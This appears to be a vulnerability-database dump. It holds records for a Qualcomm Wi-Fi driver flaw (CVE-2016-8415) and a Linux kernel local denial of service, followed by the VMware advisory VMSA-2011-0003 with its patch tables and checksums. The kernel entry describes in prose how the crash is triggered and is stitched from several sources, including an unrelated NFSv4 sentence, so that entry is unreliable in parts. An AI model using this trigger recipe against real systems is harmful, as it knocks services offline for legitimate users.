        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "id": "VAR-201701-0092",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:20:11.875000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin - January 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleNexusQualcommWi-FiDriver Privilege Escalation Vulnerability",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/87679"
      },
      {
        "title": "Google Pixel XL , Pixel  and Nexus 5X Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=66770"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014January 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=e8654f311f23268a7da69416ca7535a2"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-284",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/95260"
      },
      {
        "trust": 1.8,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-8415"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-8415"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2017-01-01.html "
      },
      {
        "trust": 0.3,
        "url": "https://source.codeaurora.org/quic/la/platform/vendor/qcom-opensource/wlan/qcacld-2.0/commit/?id=188e12a816508b11771f362c852782ec9a6f9394"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/284.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "db": "BID",
        "id": "95260"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "db": "BID",
        "id": "95260"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-09T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "date": "2017-01-12T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "date": "2017-01-03T00:00:00",
        "db": "BID",
        "id": "95260"
      },
      {
        "date": "2017-01-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "date": "2017-01-12T20:59:00.217000",
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "date": "2017-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-01-09T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-00185"
      },
      {
        "date": "2017-01-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-8415"
      },
      {
        "date": "2017-01-12T05:09:00",
        "db": "BID",
        "id": "95260"
      },
      {
        "date": "2017-01-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      },
      {
        "date": "2017-01-18T02:59:13.797000",
        "db": "NVD",
        "id": "CVE-2016-8415"
      },
      {
        "date": "2017-01-10T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-006750"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201701-026"
      }
    ],
    "trust": 0.6
  }
}

var-201002-0694
Vulnerability from variot

The load_elf_binary function in fs/binfmt_elf.c in the Linux kernel before 2.6.32.8 on the x86_64 platform does not ensure that the ELF interpreter is available before a call to the SET_PERSONALITY macro, which allows local users to cause a denial of service (system crash) via a 32-bit application that attempts to execute a 64-bit application and then triggers a segmentation fault, as demonstrated by amd64_killer, related to the flush_old_exec function. The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to cause the affected kernel to crash, denying service to legitimate users. Versions prior to Linux kernel 2.6.33-rc6 are vulnerable. NOTE: This issue can be exploited only on 64-bit architectures. Core dumps must be enabled. The NFSv4 implementation is one of the distributed file system protocols. This doesn't cause problems if execve() succeeds, but after SET_PERSONALITY() the open_exec() call fails because the interpreter cannot be found and execve() returns an error almost immediately. The vsyscall page is incorrectly mapped in /proc/PID/maps while the process is still running. At this point a segmentation fault is triggered and the kernel crashes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2011-0003 Synopsis: Third party component updates for VMware vCenter Server, vCenter Update Manager, ESXi and ESX Issue date: 2011-02-10 Updated on: 2011-02-10 (initial release of advisory) CVE numbers: --- Apache Tomcat --- CVE-2009-2693 CVE-2009-2901 CVE-2009-2902 CVE-2009-3548 CVE-2010-2227 CVE-2010-1157 --- Apache Tomcat Manager --- CVE-2010-2928 --- cURL --- CVE-2010-0734 --- COS Kernel --- CVE-2010-1084 CVE-2010-2066 CVE-2010-2070 CVE-2010-2226 CVE-2010-2248 CVE-2010-2521 CVE-2010-2524 CVE-2010-0008 CVE-2010-0415 CVE-2010-0437 CVE-2009-4308 CVE-2010-0003 CVE-2010-0007 CVE-2010-0307 CVE-2010-1086 CVE-2010-0410 CVE-2010-0730 CVE-2010-1085 CVE-2010-0291 CVE-2010-0622 CVE-2010-1087 CVE-2010-1173 CVE-2010-1437 CVE-2010-1088 CVE-2010-1187 CVE-2010-1436 CVE-2010-1641 CVE-2010-3081 --- Microsoft SQL Express --- CVE-2008-5416 CVE-2008-0085 CVE-2008-0086 CVE-2008-0107 CVE-2008-0106 --- OpenSSL --- CVE-2010-0740 CVE-2010-0433 CVE-2010-3864 CVE-2010-2939 --- Oracle (Sun) JRE --- CVE-2009-3555 CVE-2010-0082 CVE-2010-0084 CVE-2010-0085 CVE-2010-0087 CVE-2010-0088 CVE-2010-0089 CVE-2010-0090 CVE-2010-0091 CVE-2010-0092 CVE-2010-0093 CVE-2010-0094 CVE-2010-0095 CVE-2010-0837 CVE-2010-0838 CVE-2010-0839 CVE-2010-0840 CVE-2010-0841 CVE-2010-0842 CVE-2010-0843 CVE-2010-0844 CVE-2010-0845 CVE-2010-0846 CVE-2010-0847 CVE-2010-0848 CVE-2010-0849 CVE-2010-0850 CVE-2010-0886 CVE-2010-3556 CVE-2010-3566 CVE-2010-3567 CVE-2010-3550 CVE-2010-3561 CVE-2010-3573 CVE-2010-3565 CVE-2010-3568 CVE-2010-3569 CVE-2010-1321 CVE-2010-3548 CVE-2010-3551 CVE-2010-3562 CVE-2010-3571 CVE-2010-3554 CVE-2010-3559 CVE-2010-3572 CVE-2010-3553 CVE-2010-3549 CVE-2010-3557 CVE-2010-3541 CVE-2010-3574 --- pam_krb5 --- CVE-2008-3825 CVE-2009-1384


  1. Summary

Update 1 for vCenter Server 4.1, vCenter Update Manager 4.1, vSphere Hypervisor (ESXi) 4.1, ESXi 4.1, addresses several security issues.

  1. Relevant releases

vCenter Server 4.1 without Update 1,

vCenter Update Manager 4.1 without Update 1,

ESXi 4.1 without patch ESXi410-201101201-SG,

ESX 4.1 without patch ESX410-201101201-SG.

  1. Problem Description

a. vCenter Server and vCenter Update Manager update Microsoft SQL Server 2005 Express Edition to Service Pack 3

Microsoft SQL Server 2005 Express Edition (SQL Express)
distributed with vCenter Server 4.1 Update 1 and vCenter Update
Manager 4.1 Update 1 is upgraded from  SQL Express Service Pack 2
to SQL Express Service Pack 3, to address multiple security
issues that exist in the earlier releases of Microsoft SQL Express.

Customers using other database solutions need not update for
these issues.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-5416, CVE-2008-0085, CVE-2008-0086,
CVE-2008-0107 and CVE-2008-0106 to the issues addressed in MS SQL
Express Service Pack 3.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • Hosted products are VMware Workstation, Player, ACE, Fusion.

b. vCenter Apache Tomcat Management Application Credential Disclosure

The Apache Tomcat Manager application configuration file contains
logon credentials that can be read by unprivileged local users.

The issue is resolved by removing the Manager application in
vCenter 4.1 Update 1.

If vCenter 4.1 is updated to vCenter 4.1 Update 1 the logon
credentials are not present in the configuration file after the
update.

VMware would like to thank Claudio Criscione of Secure Networking
for reporting this issue to us.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-2928 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not affected
VirtualCenter  2.5       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            any       ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

c. vCenter Server and ESX, Oracle (Sun) JRE is updated to version 1.6.0_21

Oracle (Sun) JRE update to version 1.6.0_21, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,
CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,
CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,
CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,
CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,
CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,
CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,
CVE-2010-0850.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following name to the security issue fixed in
Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  not applicable **
VirtualCenter  2.5       Windows  not applicable **

Update Manager 4.1       Windows  not applicable **
Update Manager 4.0       Windows  not applicable **
Update Manager 1.0       Windows  not applicable **


hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not applicable **
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.5.0 family

d. vCenter Update Manager Oracle (Sun) JRE is updated to version 1.5.0_26

Oracle (Sun) JRE update to version 1.5.0_26, which addresses
multiple security issues that existed in earlier releases of
Oracle (Sun) JRE.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,
CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,
CVE-2010-3565,CVE-2010-3568, CVE-2010-3569,  CVE-2009-3555,
CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,
CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,
CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,
CVE-2010-3574.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  not applicable **
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

Update Manager 4.1       Windows  Update 1
Update Manager 4.0       Windows  affected, patch pending
Update Manager 1.0       Windows  affected, no patch planned

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      not applicable **
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, no patch planned
ESX            3.0.3     ESX      affected, no patch planned
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Oracle (Sun) JRE 1.6.0 family

e. vCenter Server and ESX Apache Tomcat updated to version 6.0.28

Apache Tomcat updated to version 6.0.28, which addresses multiple
security issues that existed in earlier releases of Apache Tomcat

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i
and CVE-2009-3548.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the following names to the security issues fixed in
Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  not applicable **

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable **
ESX            3.0.3     ESX      not applicable **
  • hosted products are VMware Workstation, Player, ACE, Fusion. ** this product uses the Apache Tomcat 5.5 family

f. vCenter Server third party component OpenSSL updated to version 0.9.8n

The version of the OpenSSL library in vCenter Server is updated to
0.9.8n.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0740 and CVE-2010-0433 to the
issues addressed in this version of OpenSSL.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        4.1       Windows  Update 1
vCenter        4.0       Windows  affected, patch pending
VirtualCenter  2.5       Windows  affected, no patch planned

hosted *       any       any      not applicable

ESXi           any       ESXi     not applicable

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

g. ESX third party component OpenSSL updated to version 0.9.8p

The version of the ESX OpenSSL library is updated to 0.9.8p.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-3864 and CVE-2010-2939 to the
issues addressed in this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not applicable

hosted *       any       any      not applicable
ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Fusion.

h. ESXi third party component cURL updated

The version of cURL library in ESXi is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0734 to the issues addressed in
this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.1       ESXi     ESXi410-201101201-SG
ESXi           4.0       ESXi     affected, patch pending
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

i. ESX third party component pam_krb5 updated

The version of pam_krb5 library is updated.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2008-3825 and CVE-2009-1384 to the
issues addressed in the update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      not affected
ESX            3.5       ESX      not affected
ESX            3.0.3     ESX      not affected
  • hosted products are VMware Workstation, Player, ACE, Fusion.

j. ESX third party update for Service Console kernel

The Service Console kernel is updated to include kernel version
2.6.18-194.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,
CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,
CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,
CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,
CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,
CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,
CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and
CVE-2010-3081 to the issues addressed in the update.

Note: This update also addresses the 64-bit compatibility mode
stack pointer underflow issue identified by CVE-2010-3081. This
issue was patched in an ESX 4.1 patch prior to the release of
ESX 4.1 Update 1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
vCenter        any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      ESX410-201101201-SG
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
  • hosted products are VMware Workstation, Player, ACE, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the checksum of your downloaded file.

VMware vCenter Server 4.1 Update 1 and modules


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes: http://downloads.vmware.com/support/pubs/vs_pages/vsp_pubs_esx41_vc41.html

File type: .iso md5sum: 729cf247aa5d33ceec431c86377eee1a sha1sum: c1e10a5fcbc1ae9d13348d43541d574c563d66f0

File type: .zip md5sum: fd1441bef48a153f2807f6823790e2f0 sha1sum: 31737a816ed1c08ab3a505fb6db2483f49ad7c19

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi 4.1 Installable Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esxi41_u1_rel_notes.html http://kb.vmware.com/kb/1027919

File type: .iso MD5SUM: d68d6c2e040a87cd04cd18c04c22c998 SHA1SUM: bbaacc0d34503822c14f6ccfefb6a5b62d18ae64

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.1) File type: .zip MD5SUM: 2f1e009c046b20042fae3b7ca42a840f SHA1SUM: 1c9c644012dec657a705ddd3d033cbfb87a1fab1

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 4.0) File type: .zip MD5SUM: 67b924618d196dafaf268a7691bd1a0f SHA1SUM: 9d74b639e703259d9e49c0341158e0d4e45de516

ESXi 4.1 Update 1 (upgrade ZIP from ESXi 3.5) File type: .zip MD5SUM: a6024b9f6c6b7b2c629696afc6d07cf4 SHA1SUM: b3841de1a30617ac68d5a861882aa72de3a93488

VMware Tools CD image for Linux Guest OSes File type: .iso MD5SUM: dad66fa8ece1dd121c302f45444daa70 SHA1SUM: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe MD5SUM: cb6aa91ada1289575355d79e8c2a9f8e SHA1SUM: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESXi Installable Update 1 contains the following security bulletins: ESXi410-201101201-SG.

ESX 4.1 Update 1


http://downloads.vmware.com/d/info/datacenter_downloads/vmware_vsphere_4/4_0 Release Notes:

http://downloads.vmware.com/support/vsphere4/doc/vsp_esx41_u1_rel_notes.html http://kb.vmware.com/kb/1029353

ESX 4.1 Update 1 (DVD ISO) File type: .iso md5sum: b9a275b419a20c7bedf31c0bf64f504e sha1sum: 2d85edcaca8218013585e1eab00bc80db6d96e11

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.1) File type: .zip md5sum: 2d81a87e994aa2b329036f11d90b4c14 sha1sum: c2bfc0cf7ac03d24afd5049ddbd09a865aad1798

Pre-upgrade package for ESX 4.0 to ESX 4.1 Update 1 File type: .zip md5sum: 75f8cebfd55d8a81deb57c27def963c2 sha1sum: 889c15aa8008fe0e29439d0ab3468c2beb1c4fe2

ESX 4.1 Update 1 (upgrade ZIP from ESX 4.0) File type: .zip md5sum: 1dc9035cd10e7e60d27e7a7aef57b4c2 sha1sum: e6d3fb65d83a3e263d0f634a3572025854ff8922

VMware Tools CD image for Linux Guest OSes File type: .iso md5sum: dad66fa8ece1dd121c302f45444daa70 sha1sum: 56535a2cfa7799607356c6fd0a7d9f041da614af

VMware vSphere Client File type: .exe md5sum: cb6aa91ada1289575355d79e8c2a9f8e sha1sum: f9e3d8eb83196ae7c31aab554e344a46b722b1e4

ESX410-Update01 contains the following security bulletins: ESX410-201101201-SG (COS kernel, pam_krb5, cURL, OpenSSL, Apache Tomcat, Oracle (Sun) JRE) | http://kb.vmware.com/kb/1027904 ESX410-201101226-SG (glibc) | http://kb.vmware.com/kb/1031330

ESX410-Update01 also contains the following non-security bulletins ESX410-201101211-UG, ESX410-201101213-UG, ESX410-201101215-UG, ESX410-201101202-UG, ESX410-201101203-UG, ESX410-201101204-UG, ESX410-201101206-UG, ESX410-201101207-UG, ESX410-201101208-UG, ESX410-201101214-UG, ESX410-201101216-UG, ESX410-201101217-UG, ESX410-201101218-UG, ESX410-201101219-UG, ESX410-201101220-UG, ESX410-201101221-UG, ESX410-201101222-UG, ESX410-201101225-UG.

To install an individual bulletin use esxupdate with the -b option.

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5416 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0086 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0106 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2928 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0084 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0085 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0087 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0088 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0089 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0090 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0091 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0092 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0093 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0095 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0837 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0838 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0839 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0840 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0841 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0842 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0843 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0844 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0845 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0846 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0847 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0886 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2693 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2901 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2902 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3548 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1157 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0740 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0433 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3864 